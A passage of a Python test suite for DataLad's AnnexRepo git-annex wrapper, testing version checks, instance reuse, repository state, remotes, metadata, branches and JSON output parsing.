test_annex_version_handling_bad_git_annex(path=None):\n with set_annex_version(None):\n eq_(AnnexRepo.git_annex_version, None)\n with assert_raises(MissingExternalDependency) as cme:\n AnnexRepo(path)\n linux_distribution_name = get_linux_distribution()[0]\n if linux_distribution_name == 'debian':\n assert_in(\"handbook.datalad.org\", str(cme.value))\n eq_(AnnexRepo.git_annex_version, None)\n\n with set_annex_version('6.20160505'):\n eq_(AnnexRepo.git_annex_version, None)\n try:\n # Note: Remove to cause creation of a new instance\n rmtree(path)\n except OSError:\n pass\n assert_raises(OutdatedExternalDependency, AnnexRepo, path)\n # and we don't assign it\n eq_(AnnexRepo.git_annex_version, None)\n # so we could still fail\n try:\n # Note: Remove to cause creation of a new instance\n rmtree(path)\n except OSError:\n pass\n assert_raises(OutdatedExternalDependency, AnnexRepo, path)\n\n\n@with_tempfile\n@with_tempfile\ndef test_get_description(path1=None, path2=None):\n annex1 = AnnexRepo(path1, create=True)\n # some content for git-annex branch\n create_tree(path1, {'1.dat': 
'content'})\n annex1.add('1.dat', git=False)\n annex1.commit(\"msg\")\n annex1_description = annex1.get_description()\n assert_not_equal(annex1_description, path1)\n\n annex2 = AnnexRepo(path2, create=True, description='custom 2')\n eq_(annex2.get_description(), 'custom 2')\n # not yet known\n eq_(annex2.get_description(uuid=annex1.uuid), None)\n\n annex2.add_remote('annex1', path1)\n annex2.fetch('annex1')\n # it will match the remote name\n eq_(annex2.get_description(uuid=annex1.uuid),\n annex1_description + ' [annex1]')\n # add a little probe file to make sure it stays untracked\n create_tree(path1, {'probe': 'probe'})\n assert_not_in('probe', annex2.get_indexed_files())\n annex2.localsync('annex1')\n assert_not_in('probe', annex2.get_indexed_files())\n # but let's remove the remote\n annex2.remove_remote('annex1')\n eq_(annex2.get_description(uuid=annex1.uuid), annex1_description)\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_AnnexRepo_flyweight(path1=None, path2=None):\n\n import sys\n\n repo1 = AnnexRepo(path1, create=True)\n assert_is_instance(repo1, AnnexRepo)\n\n # Due to issue 4862, we currently still require gc.collect() under unclear\n # circumstances to get rid of an exception traceback when creating in an\n # existing directory. That traceback references the respective function\n # frames which in turn reference the repo instance (they are methods).\n # Doesn't happen on all systems, though. Eventually we need to figure that\n # out.\n # However, still test for the refcount after gc.collect() to ensure we don't\n # introduce new circular references and make the issue worse!\n gc.collect()\n\n # As long as we don't reintroduce any circular references or produce\n # garbage during instantiation that isn't picked up immediately, `repo1`\n # should be the only counted reference to this instance.\n # Note, that sys.getrefcount reports its own argument and therefore one\n # reference too much.\n assert_equal(1, sys.getrefcount(repo1) - 1)\n\n # instantiate again:\n repo2 = AnnexRepo(path1, create=False)\n assert_is_instance(repo2, AnnexRepo)\n # the very same object:\n ok_(repo1 is repo2)\n\n # reference the same in an different way:\n with chpwd(path1):\n repo3 = AnnexRepo(relpath(path1, start=path2), create=False)\n assert_is_instance(repo3, AnnexRepo)\n # it's the same object:\n ok_(repo1 is repo3)\n\n # but path attribute is absolute, so they are still equal:\n ok_(repo1 == repo3)\n\n # Now, let's try to get a GitRepo instance from a path, we already have an\n # AnnexRepo of\n repo4 = GitRepo(path1)\n assert_is_instance(repo4, GitRepo)\n assert_not_is_instance(repo4, AnnexRepo)\n\n orig_id = id(repo1)\n\n # Be sure we have exactly one object in memory:\n assert_equal(1, len([o for o in gc.get_objects()\n if isinstance(o, AnnexRepo) and o.path == path1]))\n\n\n # But we have two GitRepos in memory (the AnnexRepo and repo4):\n assert_equal(2, len([o for o in gc.get_objects()\n if isinstance(o, GitRepo) and o.path == path1]))\n\n # deleting one reference doesn't change anything - we still get the same\n # thing:\n del repo1\n gc.collect() # TODO: see first comment above\n ok_(repo2 is not None)\n ok_(repo2 is repo3)\n ok_(repo2 == repo3)\n\n repo1 = AnnexRepo(path1)\n eq_(orig_id, id(repo1))\n\n del repo1\n del repo2\n\n # for testing that destroying the object calls close() on BatchedAnnex:\n class Dummy:\n def __init__(self, *args, **kwargs):\n self.close_called = False\n\n def close(self):\n self.close_called = True\n\n fake_batch = Dummy()\n\n # Killing 
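# --- Editor's illustrative aside, not part of the original test suite. ---
# The flyweight behaviour verified above, condensed: requesting an AnnexRepo
# for the same path hands back the very same instance, while GitRepo keeps a
# separate flyweight pool for that path.  `path` is a hypothetical directory.
def _demo_flyweight(path):
    from datalad.support.annexrepo import AnnexRepo
    from datalad.support.gitrepo import GitRepo
    a1 = AnnexRepo(path, create=True)
    a2 = AnnexRepo(path)      # no second instance is created
    assert a1 is a2
    g = GitRepo(path)         # plain-Git view on the same repository
    assert g is not a1
    assert not isinstance(g, AnnexRepo)
# --- end of aside ---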
last reference will lead to garbage collection which will call\n # AnnexRepo's finalizer:\n with patch.object(repo3._batched, 'close', fake_batch.close):\n with swallow_logs(new_level=1) as cml:\n del repo3\n gc.collect() # TODO: see first comment above\n cml.assert_logged(msg=\"Finalizer called on: AnnexRepo(%s)\" % path1,\n level=\"Level 1\",\n regex=False)\n # finalizer called close() on BatchedAnnex:\n assert_true(fake_batch.close_called)\n\n # Flyweight is gone:\n assert_not_in(path1, AnnexRepo._unique_instances.keys())\n\n # gc doesn't know any instance anymore:\n assert_equal([], [o for o in gc.get_objects()\n if isinstance(o, AnnexRepo) and o.path == path1])\n # GitRepo is unaffected:\n assert_equal(1, len([o for o in gc.get_objects()\n if isinstance(o, GitRepo) and o.path == path1]))\n\n # new object is created on re-request:\n repo1 = AnnexRepo(path1)\n assert_equal(1, len([o for o in gc.get_objects()\n if isinstance(o, AnnexRepo) and o.path == path1]))\n\n\n@with_tempfile\n@with_tempfile(mkdir=True)\n@with_tempfile\ndef test_AnnexRepo_get_toppath(repo=None, tempdir=None, repo2=None):\n AnnexRepo(repo, create=True)\n\n reporeal = str(Path(repo).resolve())\n eq_(AnnexRepo.get_toppath(repo, follow_up=False), reporeal)\n eq_(AnnexRepo.get_toppath(repo), repo)\n # Generate some nested directory\n AnnexRepo(repo2, create=True)\n repo2real = str(Path(repo2).resolve())\n nested = opj(repo2, \"d1\", \"d2\")\n os.makedirs(nested)\n eq_(AnnexRepo.get_toppath(nested, follow_up=False), repo2real)\n eq_(AnnexRepo.get_toppath(nested), repo2)\n # and if not under git, should return None\n eq_(AnnexRepo.get_toppath(tempdir), None)\n\n\ndef test_AnnexRepo_get_submodules():\n raise SkipTest(\"TODO\")\n\n\n@with_tempfile(mkdir=True)\ndef test_AnnexRepo_dirty(path=None):\n\n repo = AnnexRepo(path, create=True)\n ok_(not repo.dirty)\n\n # pure git operations:\n # untracked file\n with open(opj(path, 'file1.txt'), 'w') as f:\n f.write('whatever')\n ok_(repo.dirty)\n # staged file\n repo.add('file1.txt', git=True)\n ok_(repo.dirty)\n # clean again\n repo.commit(\"file1.txt added\")\n ok_(not repo.dirty)\n # modify to be the same\n with open(opj(path, 'file1.txt'), 'w') as f:\n f.write('whatever')\n ok_(not repo.dirty)\n # modified file\n with open(opj(path, 'file1.txt'), 'w') as f:\n f.write('something else')\n ok_(repo.dirty)\n # clean again\n repo.add('file1.txt', git=True)\n repo.commit(\"file1.txt modified\")\n ok_(not repo.dirty)\n\n # annex operations:\n # untracked file\n with open(opj(path, 'file2.txt'), 'w') as f:\n f.write('different content')\n ok_(repo.dirty)\n # annexed file\n repo.add('file2.txt', git=False)\n ok_(repo.dirty)\n # commit\n repo.commit(\"file2.txt annexed\")\n\n ok_(not repo.dirty)\n\n repo.unlock(\"file2.txt\")\n # Unlocking the file is seen as a modification when we're not already in an\n # adjusted branch (for this test, that would be the case if we're on a\n # crippled filesystem).\n ok_(repo.dirty ^ repo.is_managed_branch())\n repo.save()\n ok_(not repo.dirty)\n\n subm = AnnexRepo(repo.pathobj / \"subm\", create=True)\n (subm.pathobj / \"foo\").write_text(\"foo\")\n subm.save()\n ok_(repo.dirty)\n repo.save()\n assert_false(repo.dirty)\n maybe_adjust_repo(subm)\n assert_false(repo.dirty)\n\n\n@with_tempfile(mkdir=True)\ndef test_AnnexRepo_set_remote_url(path=None):\n\n ar = AnnexRepo(path, create=True)\n ar.add_remote('some', 'http://example.com/.git')\n assert_equal(ar.config['remote.some.url'],\n 'http://example.com/.git')\n assert_not_in('remote.some.annexurl', 
ar.config.keys())\n # change url:\n ar.set_remote_url('some', 'http://believe.it')\n assert_equal(ar.config['remote.some.url'],\n 'http://believe.it')\n assert_not_in('remote.some.annexurl', ar.config.keys())\n\n # set push url:\n ar.set_remote_url('some', 'ssh://whatever.ru', push=True)\n assert_equal(ar.config['remote.some.pushurl'],\n 'ssh://whatever.ru')\n assert_in('remote.some.annexurl', ar.config.keys())\n assert_equal(ar.config['remote.some.annexurl'],\n 'ssh://whatever.ru')\n\n\n@with_tempfile(mkdir=True)\ndef test_wanted(path=None):\n ar = AnnexRepo(path, create=True)\n eq_(ar.get_preferred_content('wanted'), None)\n # test samples with increasing \"trickiness\"\n for v in (\"standard\",\n \"include=*.nii.gz or include=*.nii\",\n \"exclude=archive/* and (include=*.dat or smallerthan=2b)\"\n ):\n ar.set_preferred_content('wanted', expr=v)\n eq_(ar.get_preferred_content('wanted'), v)\n # give it some file so clone/checkout works without hiccups\n create_tree(ar.path, {'1.dat': 'content'})\n ar.add('1.dat')\n ar.commit(msg=\"blah\")\n # make a clone and see if all cool there\n # intentionally clone as pure Git and do not annex init so to see if we\n # are ignoring crummy log msgs\n ar1_path = ar.path + '_1'\n GitRepo.clone(ar.path, ar1_path)\n ar1 = AnnexRepo(ar1_path, init=False)\n eq_(ar1.get_preferred_content('wanted'), None)\n eq_(ar1.get_preferred_content('wanted', DEFAULT_REMOTE), v)\n ar1.set_preferred_content('wanted', expr='standard')\n eq_(ar1.get_preferred_content('wanted'), 'standard')\n\n\n@with_tempfile(mkdir=True)\ndef test_AnnexRepo_metadata(path=None):\n # prelude\n obscure_name = get_most_obscure_supported_name()\n\n ar = AnnexRepo(path, create=True)\n create_tree(\n path,\n {\n 'up.dat': 'content',\n obscure_name: {\n obscure_name + '.dat': 'lowcontent'\n }\n })\n ar.add('.', git=False)\n ar.commit('content')\n assert_repo_status(path)\n # fugue\n # doesn't do anything if there is nothing to do\n ar.set_metadata('up.dat')\n eq_([], list(ar.get_metadata(None)))\n eq_([], list(ar.get_metadata('')))\n eq_([], list(ar.get_metadata([])))\n eq_({'up.dat': {}}, dict(ar.get_metadata('up.dat')))\n # basic invocation\n eq_(1, len(ar.set_metadata(\n 'up.dat',\n reset={'mike': 'awesome'},\n add={'tag': 'awesome'},\n remove={'tag': 'awesome'}, # cancels prev, just to use it\n init={'virgin': 'true'},\n purge=['nothere'])))\n # no timestamps by default\n md = dict(ar.get_metadata('up.dat'))\n deq_({'up.dat': {\n 'virgin': ['true'],\n 'mike': ['awesome']}},\n md)\n # matching timestamp entries for all keys\n md_ts = dict(ar.get_metadata('up.dat', timestamps=True))\n for k in md['up.dat']:\n assert_in('{}-lastchanged'.format(k), md_ts['up.dat'])\n assert_in('lastchanged', md_ts['up.dat'])\n # recursive needs a flag\n assert_raises(CommandError, ar.set_metadata, '.', purge=['virgin'])\n ar.set_metadata('.', purge=['virgin'], recursive=True)\n deq_({'up.dat': {\n 'mike': ['awesome']}},\n dict(ar.get_metadata('up.dat')))\n # Use trickier tags (spaces, =)\n ar.set_metadata('.', reset={'tag': 'one and= '}, purge=['mike'], recursive=True)\n playfile = opj(obscure_name, obscure_name + '.dat')\n target = {\n 'up.dat': {\n 'tag': ['one and= ']},\n playfile: {\n 'tag': ['one and= ']}}\n deq_(target, dict(ar.get_metadata('.')))\n for batch in (True, False):\n # no difference in reporting between modes\n deq_(target, dict(ar.get_metadata(['up.dat', playfile], batch=batch)))\n # incremental work like a set\n ar.set_metadata(playfile, add={'tag': 'one and= '})\n deq_(target, 
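# --- Editor's illustrative aside, not part of the original test suite. ---
# A short sketch of the remote-URL and preferred-content handling covered
# above.  The remote name and URLs are placeholders; only methods already
# exercised in these tests are used.
def _demo_remote_and_wanted(path):
    from datalad.support.annexrepo import AnnexRepo
    ar = AnnexRepo(path, create=True)
    ar.add_remote('some', 'http://example.com/.git')
    # push=True also records an annex-specific URL for the remote
    ar.set_remote_url('some', 'ssh://example.com/repo', push=True)
    assert ar.config['remote.some.pushurl'] == 'ssh://example.com/repo'
    # git-annex preferred-content ("wanted") expressions round-trip as strings
    assert ar.get_preferred_content('wanted') is None
    ar.set_preferred_content('wanted', expr='include=*.nii.gz or include=*.nii')
    assert ar.get_preferred_content('wanted') == 'include=*.nii.gz or include=*.nii'
# --- end of aside ---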
dict(ar.get_metadata('.')))\n ar.set_metadata(playfile, add={'tag': ' two'})\n # returned values are sorted\n eq_([' two', 'one and= '], dict(ar.get_metadata(playfile))[playfile]['tag'])\n # init honor prior values\n ar.set_metadata(playfile, init={'tag': 'three'})\n eq_([' two', 'one and= '], dict(ar.get_metadata(playfile))[playfile]['tag'])\n ar.set_metadata(playfile, remove={'tag': ' two'})\n deq_(target, dict(ar.get_metadata('.')))\n # remove non-existing doesn't error and doesn't change anything\n ar.set_metadata(playfile, remove={'ether': 'best'})\n deq_(target, dict(ar.get_metadata('.')))\n # add works without prior existence\n ar.set_metadata(playfile, add={'novel': 'best'})\n eq_(['best'], dict(ar.get_metadata(playfile))[playfile]['novel'])\n\n\n@with_tree(tree={'file.txt': 'content'})\n@serve_path_via_http()\n@with_tempfile\ndef test_AnnexRepo_addurl_batched_and_set_metadata(path=None, url=None, dest=None):\n ar = AnnexRepo(dest, create=True)\n fname = \"file.txt\"\n ar.add_url_to_file(fname, urljoin(url, fname), batch=True)\n ar.set_metadata(fname, init={\"number\": \"one\"})\n eq_([\"one\"], dict(ar.get_metadata(fname))[fname][\"number\"])\n\n\n@with_tempfile(mkdir=True)\ndef test_change_description(path=None):\n # prelude\n ar = AnnexRepo(path, create=True, description='some')\n eq_(ar.get_description(), 'some')\n # try change it\n ar = AnnexRepo(path, create=False, init=True, description='someother')\n # this doesn't cut the mustard, still old\n eq_(ar.get_description(), 'some')\n # need to resort to \"internal\" helper\n ar._init(description='someother')\n eq_(ar.get_description(), 'someother')\n\n\n@with_tempfile\n@with_tempfile\ndef test_AnnexRepo_get_corresponding_branch(src_path=None, path=None):\n src = AnnexRepo(src_path, create=True)\n (src.pathobj / 'test-annex.dat').write_text(\"content\")\n src.save('some')\n\n ar = AnnexRepo.clone(src_path, path)\n\n # we should be on the default branch.\n eq_(DEFAULT_BRANCH,\n ar.get_corresponding_branch() or ar.get_active_branch())\n\n # special case v6 adjusted branch is not provided by a dedicated build:\n ar.adjust()\n # as above, we still want to get the default branch, while being on\n # 'adjusted/<default branch>(unlocked)'\n eq_('adjusted/{}(unlocked)'.format(DEFAULT_BRANCH),\n ar.get_active_branch())\n eq_(DEFAULT_BRANCH, ar.get_corresponding_branch())\n\n\n@with_tempfile\n@with_tempfile\ndef test_AnnexRepo_get_tracking_branch(src_path=None, path=None):\n src = AnnexRepo(src_path, create=True)\n (src.pathobj / 'test-annex.dat').write_text(\"content\")\n src.save('some')\n\n ar = AnnexRepo.clone(src_path, path)\n\n # we want the relation to original branch, e.g. 
in v6+ adjusted branch\n eq_((DEFAULT_REMOTE, 'refs/heads/' + DEFAULT_BRANCH),\n ar.get_tracking_branch())\n\n\n@skip_if_adjusted_branch\n@with_tempfile\ndef test_AnnexRepo_is_managed_branch(path=None):\n ar = AnnexRepo(path, create=True)\n (ar.pathobj / 'test-annex.dat').write_text(\"content\")\n ar.save('some')\n\n ar.adjust()\n ok_(ar.is_managed_branch())\n\n\n@with_tempfile(mkdir=True)\ndef test_fake_is_not_special(path=None):\n ar = AnnexRepo(path, create=True)\n # doesn't exist -- we fail by default\n assert_raises(RemoteNotAvailableError, ar.is_special_annex_remote, \"fake\")\n assert_false(ar.is_special_annex_remote(\"fake\", check_if_known=False))\n\n\n@with_tree(tree={\"remote\": {}, \"main\": {}, \"special\": {}})\ndef test_is_special(path=None):\n rem = AnnexRepo(op.join(path, \"remote\"), create=True)\n dir_arg = \"directory={}\".format(op.join(path, \"special\"))\n rem.init_remote(\"imspecial\",\n [\"type=directory\", \"encryption=none\", dir_arg])\n ok_(rem.is_special_annex_remote(\"imspecial\"))\n\n ar = AnnexRepo.clone(rem.path, op.join(path, \"main\"))\n assert_false(ar.is_special_annex_remote(DEFAULT_REMOTE))\n\n assert_false(ar.is_special_annex_remote(\"imspecial\",\n check_if_known=False))\n ar.enable_remote(\"imspecial\", options=[dir_arg])\n ok_(ar.is_special_annex_remote(\"imspecial\"))\n\n # With a mis-configured remote, give warning and return false.\n ar.config.unset(f\"remote.{DEFAULT_REMOTE}.url\", scope=\"local\")\n with swallow_logs(new_level=logging.WARNING) as cml:\n assert_false(ar.is_special_annex_remote(DEFAULT_REMOTE))\n cml.assert_logged(msg=\".*no URL.*\", level=\"WARNING\", regex=True)\n\n\n@with_tempfile(mkdir=True)\ndef test_fake_dates(path=None):\n ar = AnnexRepo(path, create=True, fake_dates=True)\n timestamp = ar.config.obtain(\"datalad.fake-dates-start\") + 1\n # Commits from the \"git annex init\" call are one second ahead.\n for commit in ar.get_branch_commits_(\"git-annex\"):\n eq_(timestamp, int(ar.format_commit('%ct', commit)))\n assert_in(\"timestamp={}s\".format(timestamp),\n ar.call_git([\"cat-file\", \"blob\", \"git-annex:uuid.log\"], read_only=True))\n\n\n# to prevent regression\n# http://git-annex.branchable.com/bugs/v6_-_under_subdir__58___git_add___34__whines__34____44___git_commit___34__blows__34__/\n# It is disabled because is not per se relevant to DataLad since we do not\n# Since we invoke from the top of the repo, we do not hit it,\n# but thought to leave it around if we want to enforce/test system-wide git being\n# compatible with annex for v6 mode\n@with_tempfile(mkdir=True)\ndef _test_add_under_subdir(path):\n ar = AnnexRepo(path, create=True, version=6)\n gr = GitRepo(path) # \"Git\" view over the repository, so we force \"git add\"\n subdir = opj(path, 'sub')\n subfile = opj('sub', 'empty')\n # os.mkdir(subdir)\n create_tree(subdir, {'empty': ''})\n runner = Runner(cwd=subdir)\n with chpwd(subdir):\n runner.run(['git', 'add', 'empty']) # should add successfully\n # gr.commit('important') #\n runner.run(['git', 'commit', '-m', 'important'])\n ar.is_under_annex(subfile)\n\n\n# https://github.com/datalad/datalad/issues/2892\n@with_tempfile(mkdir=True)\ndef test_error_reporting(path=None):\n ar = AnnexRepo(path, create=True)\n res = ar.call_annex_records(['add'], files='gl\\\\orious BS')\n target = {\n 'command': 'add',\n # whole thing, despite space, properly quotes backslash\n 'file': 'gl\\\\orious BS',\n 'note': 'not found',\n 'success': False\n }\n assert len(res) >= 1\n if 'message-id' in res[0]:\n # new since ~ 
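# --- Editor's illustrative aside, not part of the original test suite. ---
# A hedged sketch of the branch queries used above.  It assumes a filesystem
# where the clone starts out on a regular (non-adjusted) branch; the paths and
# file name are placeholders.
def _demo_adjusted_branch_queries(src_path, clone_path):
    from datalad.support.annexrepo import AnnexRepo
    src = AnnexRepo(src_path, create=True)
    (src.pathobj / 'f.dat').write_text('content')
    src.save('initial')
    ar = AnnexRepo.clone(src_path, clone_path)
    # without an adjusted branch there is no "corresponding" branch yet
    branch = ar.get_corresponding_branch() or ar.get_active_branch()
    ar.adjust()
    assert ar.is_managed_branch()
    assert ar.get_active_branch().startswith('adjusted/')
    assert ar.get_corresponding_branch() == branch
    # the clone tracks the original branch on its default remote
    remote, ref = ar.get_tracking_branch()
    assert ref.endswith(branch)
# --- end of aside ---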
10.20230407-99-gbe36e208c2\n target['message-id'] = 'FileNotFound'\n target['input'] = ['gl\\\\orious BS']\n target['error-messages'] = ['git-annex: gl\\\\orious BS not found']\n else:\n # our own produced record\n target['error-messages'] = ['File unknown to git']\n eq_(res, [target])\n\n\n@with_tree(tree={\n 'file1': \"content1\",\n 'dir1': {'file2': 'content2'},\n})\ndef test_annexjson_protocol(path=None):\n ar = AnnexRepo(path, create=True)\n ar.save()\n assert_repo_status(path)\n # first an orderly execution\n res = ar._call_annex(\n ['find', '.', '--json'],\n protocol=AnnexJsonProtocol)\n for k in ('stdout', 'stdout_json', 'stderr'):\n assert_in(k, res)\n orig_j = res['stdout_json']\n eq_(len(orig_j), 2)\n # not meant as an exhaustive check for output structure,\n # just some assurance that it is not totally alien\n ok_(all(j['file'] for j in orig_j))\n # no complaints, unless git-annex is triggered to run in debug mode\n if logging.getLogger('datalad.annex').getEffectiveLevel() > 8:\n eq_(res['stderr'], '')\n\n # Note: git-annex-find <non-existent-path> does not error with all annex\n # versions. Fixed in annex commit\n # ce91f10132805d11448896304821b0aa9c6d9845 (Feb 28, 2022).\n if '10.20220222' < external_versions['cmd:annex'] < '10.20220322':\n raise SkipTest(\"zero-exit annex-find bug\")\n\n # now the same, but with a forced error\n with assert_raises(CommandError) as e:\n ar._call_annex(['find', '.', 'error', '--json'],\n protocol=AnnexJsonProtocol)\n # normal operation is not impaired\n eq_(e.value.kwargs['stdout_json'], orig_j)\n # we get a clue what went wrong,\n # but reporting depends on config + version (default changed):\n msg = \"pathspec 'error' did not match\" if not dl_cfg.getbool(\n section=\"annex\", option=\"skipunknown\",\n # git-annex switched default for this config:\n default=bool(external_versions['cmd:annex'] < '10.20220222')) else \\\n \"error not found\"\n assert_in(msg, e.value.stderr)\n # there should be no errors reported in an individual records\n # hence also no pointless statement in the str()\n assert_not_in('errors from JSON records', str(e.value))\n\n\n@with_tempfile\ndef test_annexjson_protocol_long(path=None, *, caplog):\n records = [\n {\"k\": \"v\" * 20},\n # Value based off of\n # Lib.asyncio.unix_events._UnixReadPipeTransport.max_size.\n {\"k\": \"v\" * 256 * 1024},\n # and tiny ones in between should not be lost\n {\"k\": \"v\"},\n # even a much larger one - we should handle as well\n {\"k\": \"v\" * 256 * 1024 * 5},\n ]\n with open(path, 'w') as f:\n for record in records:\n print(\"print(%r);\" % json.dumps(record), file=f)\n runner = GitWitlessRunner()\n with caplog.at_level(logging.ERROR), \\\n swallow_logs(new_level=logging.ERROR):\n res = runner.run(\n [sys.executable, path],\n protocol=AnnexJsonProtocol\n )\n eq_(res['stdout'], '')\n eq_(res['stderr'], '')\n eq_(res['stdout_json'], records)\n\n\[email protected](\"print_opt\", ['', ', end=\"\"'])\n@with_tempfile\ndef test_annexjson_protocol_incorrect(path=None, *, print_opt, caplog):\n # Test that we still log some incorrectly formed JSON record\n bad_json = '{\"I\": \"am wrong,}'\n with open(path, 'w') as f:\n print(\"print(%r%s);\" % (bad_json, print_opt), file=f)\n runner = GitWitlessRunner()\n # caplog only to not cause memory error in case of heavy debugging\n # Unfortunately it lacks similar .assert_logged with a regex matching\n # to be just used instead\n with caplog.at_level(logging.ERROR), \\\n swallow_logs(new_level=logging.ERROR) as cml:\n res = runner.run(\n 
[sys.executable, path],\n protocol=AnnexJsonProtocol\n )\n cml.assert_logged(\n msg=\".*[rR]eceived undecodable JSON output\",\n level=\"ERROR\",\n regex=True)\n # only error logged and nothing returned\n eq_(res['stdout'], '')\n eq_(res['stderr'], '')\n eq_(res['stdout_json'], [])\n\n# see https://github.com/datalad/datalad/pull/5400 for troubleshooting\n# for stalling with unlock=False, and then with unlock=True it took >= 300 sec\n# https://github.com/datalad/datalad/pull/5433#issuecomment-784470028\n@skip_if(on_travis and on_nfs) # TODO. stalls\n# http://git-annex.branchable.com/bugs/cannot_commit___34__annex_add__34__ed_modified_file_which_switched_its_largefile_status_to_be_committed_to_git_now/#comment-bf70dd0071de1bfdae9fd4f736fd1ec\n# https://github.com/datalad/datalad/issues/1651\n@known_failure_githubci_win\[email protected](\"unlock\", [True, False])\n@with_tree(tree={\n '.gitattributes': \"** annex.largefiles=(largerthan=4b)\",\n 'alwaysbig': 'a'*10,\n 'willgetshort': 'b'*10,\n 'tobechanged-git': 'a',\n 'tobechanged-annex': 'a'*10,\n})\ndef test_commit_annex_commit_changed(path=None, *, unlock):\n # Here we test commit working correctly if file was just removed\n # (not unlocked), edited and committed back\n\n # TODO: an additional possible interaction to check/solidify - if files\n # first get unannexed (after being optionally unlocked first)\n unannex = False\n\n ar = AnnexRepo(path, create=True)\n ar.save(paths=[\".gitattributes\"], git=True)\n ar.save(\"initial commit\")\n assert_repo_status(path)\n # Now let's change all but commit only some\n files = [op.basename(p) for p in glob(op.join(path, '*'))]\n if unlock:\n ar.unlock(files)\n if unannex:\n ar.unannex(files)\n create_tree(\n path\n , {\n 'alwaysbig': 'a'*11,\n 'willgetshort': 'b',\n 'tobechanged-git': 'aa',\n 'tobechanged-annex': 'a'*11,\n 'untracked': 'unique'\n }\n , remove_existing=True\n )\n assert_repo_status(\n path\n , modified=files if not unannex else ['tobechanged-git']\n , untracked=['untracked'] if not unannex else\n # all but the one in git now\n ['alwaysbig', 'tobechanged-annex', 'untracked', 'willgetshort']\n )\n\n ar.save(\"message\", paths=['alwaysbig', 'willgetshort'])\n assert_repo_status(\n path\n , modified=['tobechanged-git', 'tobechanged-annex']\n , untracked=['untracked']\n )\n ok_file_under_git(path, 'alwaysbig', annexed=True)\n ok_file_under_git(path, 'willgetshort', annexed=False)\n\n ar.save(\"message2\", untracked='no') # commit all changed\n assert_repo_status(\n path\n , untracked=['untracked']\n )\n ok_file_under_git(path, 'tobechanged-git', annexed=False)\n ok_file_under_git(path, 'tobechanged-annex', annexed=True)\n\n\n_test_unannex_tree = {\n OBSCURE_FILENAME: 'content1',\n OBSCURE_FILENAME + \".dat\": 'content2',\n}\nif not on_windows and (\n external_versions['cmd:annex'] <= '10.20230407' or external_versions['cmd:annex'] >= '10.20230408'\n):\n # Only whenever we are not within the development versions of the 10.20230407\n # where we cannot do version comparison relibalye,\n # the case where we have entire filename within \"\"\n _test_unannex_tree[f'\"{OBSCURE_FILENAME}\"'] = 'content3'\n\n\n@with_tree(tree=_test_unannex_tree)\ndef test_unannex_etc(path=None):\n # Primarily to test if quote/unquote/not-quote'ing work for tricky\n # filenames. 
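# --- Editor's illustrative aside, not part of the original test suite. ---
# A minimal sketch of consuming git-annex JSON records via the public
# call_annex_records() helper used in the error-reporting test above.  The
# file name and content are made up; the exact set of record fields beyond
# 'command', 'success' and 'file' depends on the git-annex version.
def _demo_json_records(path):
    from datalad.support.annexrepo import AnnexRepo
    ar = AnnexRepo(path, create=True)
    (ar.pathobj / 'one.dat').write_text('1')
    # every line of `git annex add --json` output comes back as one dict
    records = ar.call_annex_records(['add'], files='one.dat')
    assert records[0]['command'] == 'add'
    assert records[0]['success'] is True
    assert records[0]['file'] == 'one.dat'
# --- end of aside ---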
Ref: https://github.com/datalad/datalad/pull/7372\n repo = AnnexRepo(path)\n files = list(_test_unannex_tree)\n # here it is through json so kinda guaranteed to work but let's check too\n assert files == [x['file'] for x in repo.add(files)]\n assert sorted(files) == sorted(repo.get_annexed_files())\n assert files == repo.unannex(files)\n\n\n@slow # 15 + 17sec on travis\[email protected](\"cls\", [GitRepo, AnnexRepo])\n@with_tempfile(mkdir=True)\ndef test_files_split_exc(topdir=None, *, cls):\n r = cls(topdir)\n # absent files -- should not crash with \"too long\" but some other more\n # meaningful exception\n files = [\"f\" * 100 + \"%04d\" % f for f in range(100000)]\n if isinstance(r, AnnexRepo):\n # Annex'es add first checks for what is being added and does not fail\n # for non existing files either ATM :-/ TODO: make consistent etc\n r.add(files)\n else:\n with assert_raises(Exception) as ecm:\n r.add(files)\n assert_not_in('too long', str(ecm.value))\n assert_not_in('too many', str(ecm.value))\n\n\n# with 204 (/ + (98+3)*2 + /) chars guaranteed, we hit \"filename too long\" quickly on windows\n# so we are doomed to shorten the filepath for testing on windows. Since the limits are smaller\n# on windows (16k vs e.g. 1m on linux in CMD_MAX_ARG), it would already be a \"struggle\" for it,\n# we also reduce number of dirs/files\n_ht_len, _ht_n = (48, 20) if on_windows else (98, 100)\n\n_HEAVY_TREE = {\n # might already run into 'filename too long' on windows probably\n \"d\" * _ht_len + '%03d' % d: {\n # populate with not entirely unique but still not all identical (empty) keys.\n # With content unique to that filename we would still get 100 identical\n # files for each key, thus possibly hitting regressions in annex like\n # https://git-annex.branchable.com/bugs/significant_performance_regression_impacting_datal/\n # but also would not hit filesystem as hard as if we had all the keys unique.\n 'f' * _ht_len + '%03d' % f: str(f)\n for f in range(_ht_n)\n }\n for d in range(_ht_n)\n}\n\n# @known_failure_windows # might fail with some older annex `cp` failing to set permissions\n@slow # 313s well -- if errors out - only 3 sec\[email protected](\"cls\", [GitRepo, AnnexRepo])\n@with_tree(tree=_HEAVY_TREE)\ndef test_files_split(topdir=None, *, cls):\n from glob import glob\n r = cls(topdir)\n dirs = glob(op.join(topdir, '*'))\n files = glob(op.join(topdir, '*', '*'))\n\n r.add(files)\n r.commit(files=files)\n\n # Let's modify and do dl.add for even a heavier test\n # Now do for real on some heavy directory\n import datalad.api as dl\n for f in files:\n os.unlink(f)\n with open(f, 'w') as f:\n f.write('1')\n dl.save(dataset=r.path, path=dirs, result_renderer=\"disabled\")\n\n\n@skip_if_on_windows\n@skip_if_root\n@with_tree({\n 'repo': {\n 'file1': 'file1',\n 'file2': 'file2'\n }\n})\ndef test_ro_operations(path=None):\n # This test would function only if there is a way to run sudo\n # non-interactively, e.g. on Travis or on your local (watchout!) 
